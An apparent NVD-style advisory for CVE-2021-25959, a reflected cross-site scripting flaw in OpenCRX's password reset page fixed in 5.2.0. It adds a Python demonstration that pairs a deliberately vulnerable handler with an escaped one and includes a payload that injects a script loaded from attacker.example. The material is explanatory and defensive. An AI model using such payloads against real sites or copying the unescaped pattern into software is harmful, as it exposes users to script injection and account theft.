Moderate severity · NVD Advisory · Published Sep 29, 2021 · Updated Sep 16, 2024
OpenCRX - Reflected Cross-Site Scripting in Password Reset Functionality
CVE-2021-25959
Description
OpenCRX versions 4.0.0 through 5.1.0 are vulnerable to reflected cross-site scripting (XSS): request parameters handled by the password reset functionality are reflected into the response without sanitization. An attacker who gets a user of the openCRX instance to open a crafted link can execute arbitrary JavaScript, including externally hosted script files, in that user's browser. The issue is fixed in 5.2.0.
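The bug class described above, as an added example that is not OpenCRX's code and does not reproduce the actual fix commit: a hypothetical password reset page that reflects an `id` parameter into an HTML attribute without escaping, beside the same page with attribute-context escaping. The page name `ResetPassword.jsp`, the parameter name `id` and the attacker URL are constructed for illustration.

```python
"""Reflected XSS in a password reset page: vulnerable vs. escaped rendering.

Added example; not OpenCRX code. The handler layout, the `id` parameter and
the attacker URL below are assumptions chosen to show the bug class.
"""
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

# Constructed attacker payload: closes the value="..." attribute, injects a
# <script> element that loads an externally hosted file (as the advisory
# describes), then re-opens an attribute so the remaining markup stays valid.
PAYLOAD = '"><script src="https://attacker.example/x.js"></script><input value="'
ATTACK_URL = "https://crm.example.test/ResetPassword.jsp?id=" + quote(PAYLOAD, safe="")


def _id_param(query: str) -> str:
    """Return the decoded `id` query parameter, or '' if absent."""
    return parse_qs(query, keep_blank_values=True).get("id", [""])[0]


def reset_page_vulnerable(query: str) -> str:
    """Reflects the raw parameter into an attribute: the vulnerable pattern."""
    ident = _id_param(query)
    return ('<form method="post" action="ResetPassword.jsp">'
            f'<input type="hidden" name="id" value="{ident}">'
            '<input type="submit" value="Reset password"></form>')


def reset_page_fixed(query: str) -> str:
    """Same page with HTML escaping; quote=True also encodes " and ' so the
    attacker cannot terminate the attribute the value sits in."""
    ident = escape(_id_param(query), quote=True)
    return ('<form method="post" action="ResetPassword.jsp">'
            f'<input type="hidden" name="id" value="{ident}">'
            '<input type="submit" value="Reset password"></form>')


def injects_script(html: str) -> bool:
    """Crude oracle: an unescaped <script ...> element appears in the output."""
    return "<script" in html.lower()


def demo() -> tuple:
    """Render the attacker URL through both handlers; returns (vulnerable, fixed)."""
    query = urlsplit(ATTACK_URL).query
    return injects_script(reset_page_vulnerable(query)), injects_script(reset_page_fixed(query))


if __name__ == "__main__":
    vulnerable_hit, fixed_hit = demo()
    print("vulnerable page executes injected script:", vulnerable_hit)
    print("escaped page executes injected script:   ", fixed_hit)
```

The escaping must match the output context: `html.escape(..., quote=True)` is correct for a double-quoted attribute and for element text, but a value reflected inside an inline `<script>` block or a JavaScript event handler needs JavaScript-string encoding instead. In a Java web application the equivalent is a templating escape such as JSTL's `fn:escapeXml` or the OWASP Java Encoder, plus a Content-Security-Policy that disallows script sources the application does not use, which would also have blocked the externally hosted script this advisory describes.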
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| org.opencrx:opencrx-core | Maven | >= 4.0.0, < 5.2.0 | 5.2.0 |
| org.opencrx:opencrx-core-models | Maven | >= 4.0.0, < 5.2.0 | 5.2.0 |
| org.opencrx:opencrx-core-config | Maven | >= 4.0.0, < 5.2.0 | 5.2.0 |
| org.opencrx:opencrx-client | Maven | >= 4.0.0, < 5.2.0 | 5.2.0 |
| org.opencrx:opencrx-gradle | Maven | >= 4.0.0, < 5.2.0 | 5.2.0 |
Affected products
Package URLs for the five Maven coordinates listed in the GitHub Security Advisory; no CPE identifiers are recorded for them.
- pkg:maven/org.opencrx/opencrx-client, range: >= 4.0.0, < 5.2.0
- pkg:maven/org.opencrx/opencrx-core, range: >= 4.0.0, < 5.2.0
- pkg:maven/org.opencrx/opencrx-core-config, range: >= 4.0.0, < 5.2.0
- pkg:maven/org.opencrx/opencrx-core-models, range: >= 4.0.0, < 5.2.0
- pkg:maven/org.opencrx/opencrx-gradle, range: >= 4.0.0, < 5.2.0
- org.opencrx/opencrx-core-config v5, range: 4.0.0
Patches
Fixed in OpenCRX 5.2.0. The fix commit in the opencrx/opencrx repository is listed under References below.
References
- GitHub Security Advisory GHSA-rwh9-8xx8-4wfm: https://github.com/advisories/GHSA-rwh9-8xx8-4wfm
- Fix commit: https://github.com/opencrx/opencrx/commit/14e75f95e5f56fbe7ee897bdf5d858788072e818
- WhiteSource vulnerability database entry: https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25959